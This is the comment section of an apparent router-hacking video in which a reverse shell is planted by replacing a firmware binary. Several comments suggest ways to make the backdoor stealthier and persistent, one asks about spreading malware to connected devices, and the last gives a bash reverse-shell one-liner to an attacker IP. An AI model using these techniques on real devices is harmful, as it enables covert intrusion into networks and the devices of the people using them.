It will be so cool if instead of overwriting other binary from the firmware , unpack the firmware , rewrite it and pack it again generate the crc and flash it on the hardware. Nice video man!
Awesome, awesome, awesome ! One thing that comes to my mind is, what if you create a bash executable script with the name aws_json. Inside it, to run both the real aws_json binary and the reverse shell. Also in case aws_json gets executed multiple times, to check in the bash script with ps if the reverse shell is already running, to start it only once. Much respect Matt !
Ive needed to cross compile pkgs from x86 to arm for my Raspberry-Pi 4 and failed miserably got uninterested and gave up i learned alot from this thank you
The Zig compiler is an awesome tool for C/C++ cross-compiling, it has GCC+MUSL baked in and supports pretty much any arch LLVM does. Much easier than maintaining various CC tool chains (and is a great systems language to boot).
19:30 That's actually a typical firmware recovery process for when you've bricked your firmware with an update. The goal is to let you flash back a valid firmware that way. (Many manufacturers lock this behind a button press, but some will just initiate it on boot as seen. Ideally there's also a signature check to ensure it only loads valid firmware from the manufacturer, but few go that far.)
Although you did say this would be a simple reverse shell; the right way to do this would be to have your code fork() and call your socket code asynchronously then have parent process fork() again to call aws_json. Next, modify your socket code to put a check up front to see if port 1234 is around bound, if so, return, otherwise setup the reverse shell. Now you have a pretty stealth back door where the functionality doesn’t change. For extra bonus points you can embed the binary bytes of aws_json into the source code of your backdoored aws_json and then extract those bytes to a RAM disk and execute it there.
Thanks for another video Matt! Question, would this kind of reverse shell survive the device being factory reset? I imagine it would not, but I am unsure. Thanks again!
hi, I would like to ask if there will be a video where you present a binary reverse engineering process and a binary exploitation, exploit development process in mips or arm architecture?
@@mattbrwn What process did you go through to select that one exactly? Would a reverse code that first calls the original aws_json (renamed) and then open the socket be better?
The victim connects to the hacker’s server, the hacker doesn’t need to know the client IP in the same way a website doesn’t need to know who you are before you connect to / load a website
But is it possible to automatically install .apk or .exe file or something else to install malicious file for all connected devices to wifi router and take full control using that router and is it possible when I use python on my router ? Thx bye.
I'd do this just for the laughs, but my hoarding doesn't let me throw away this kind of devices because "you might need it some day" lol
It will be so cool if instead of overwriting other binary from the firmware , unpack the firmware , rewrite it and pack it again generate the crc and flash it on the hardware. Nice video man!
Awesome, awesome, awesome ! One thing that comes to my mind is, what if you create a bash executable script with the name aws_json. Inside it, to run both the real aws_json binary and the reverse shell. Also in case aws_json gets executed multiple times, to check in the bash script with ps if the reverse shell is already running, to start it only once.
Much respect Matt !
Ive needed to cross compile pkgs from x86 to arm for my Raspberry-Pi 4 and failed miserably got uninterested and gave up i learned alot from this thank you
Another Amazing Video Matt, Thank you for sharing your skills with the community
The Zig compiler is an awesome tool for C/C++ cross-compiling, it has GCC+MUSL baked in and supports pretty much any arch LLVM does. Much easier than maintaining various CC tool chains (and is a great systems language to boot).
Love this series of videos, thanks!
Keep it up, thank you for the well done content 🙏
Great work Matt, I really enjoy going through these!
19:30 That's actually a typical firmware recovery process for when you've bricked your firmware with an update. The goal is to let you flash back a valid firmware that way. (Many manufacturers lock this behind a button press, but some will just initiate it on boot as seen. Ideally there's also a signature check to ensure it only loads valid firmware from the manufacturer, but few go that far.)
This was an awesome video. First time I've seen your channel before, subscribed
Although you did say this would be a simple reverse shell; the right way to do this would be to have your code fork() and call your socket code asynchronously then have parent process fork() again to call aws_json.
Next, modify your socket code to put a check up front to see if port 1234 is around bound, if so, return, otherwise setup the reverse shell.
Now you have a pretty stealth back door where the functionality doesn’t change.
For extra bonus points you can embed the binary bytes of aws_json into the source code of your backdoored aws_json and then extract those bytes to a RAM disk and execute it there.
Awesome video, clear and concise
Looks so good when it can be modified with backdoor or that stuff.
Highly educational, and also HIGHLY entertaining!! Great job.
🤝
Would be nice to see smart TV hacking.
😃
Regards..
I have an TCL TV which is notoriously bad. but family would not be happy with me if it was in pieces on my desk XD
@@mattbrwn 😄 ye, understandable..
Thanks matt, i would never buy resell modem anymore 🤣
Thanks for another video Matt! Question, would this kind of reverse shell survive the device being factory reset? I imagine it would not, but I am unsure. Thanks again!
Probably not but it could be possible to modify part of the factory reset logic to maintain the backdoor. All depends on how the FR is implemented
Sorry for the comment piggyback, What if you bought a new chip and rewrote the ROM, then soldered your custom chip to the board?
hi, I would like to ask if there will be a video where you present a binary reverse engineering process and a binary exploitation, exploit development process in mips or arm architecture?
yes I'm hoping to do some binary RE videos here in the future.
Great work
This Hard!
keep going 👍🏻
What's the purpose of renaming root to admin? Is it used for authentication via web UI?
looking forward discord community😊
I think the 15 second wait to try and boot firmware over ethernet is to unbrick a router.
Does your new aws_json hang the boot process, or does it just happen at the end? Nothing appeared in the logs after your reverse shell ran
It just happens at the end
@@mattbrwn What process did you go through to select that one exactly? Would a reverse code that first calls the original aws_json (renamed) and then open the socket be better?
Is there a way I can hack my $400 nighthawk X4s to use it without having to pay fNetgear for a subscription service?
What feature requires a subscription??
And how are we supposed to know what's the IP address of the victim?
wdym you dont need the IP of the victim. For the reverse shell you enter your own.
The victim connects to the hacker’s server, the hacker doesn’t need to know the client IP in the same way a website doesn’t need to know who you are before you connect to / load a website
But is it possible to automatically install .apk or .exe file or something else to install malicious file for all connected devices to wifi router and take full control using that router and is it possible when I use python on my router ?
Thx bye.
🤡🤡
Nice vids but damn bro you speak so slowly its crazy :D , at 1.5 speed you sound normal x)
I just love the good old bash -i >& /dev/tcp/10.10.14.x/1234 0>&1 if bash is there of course...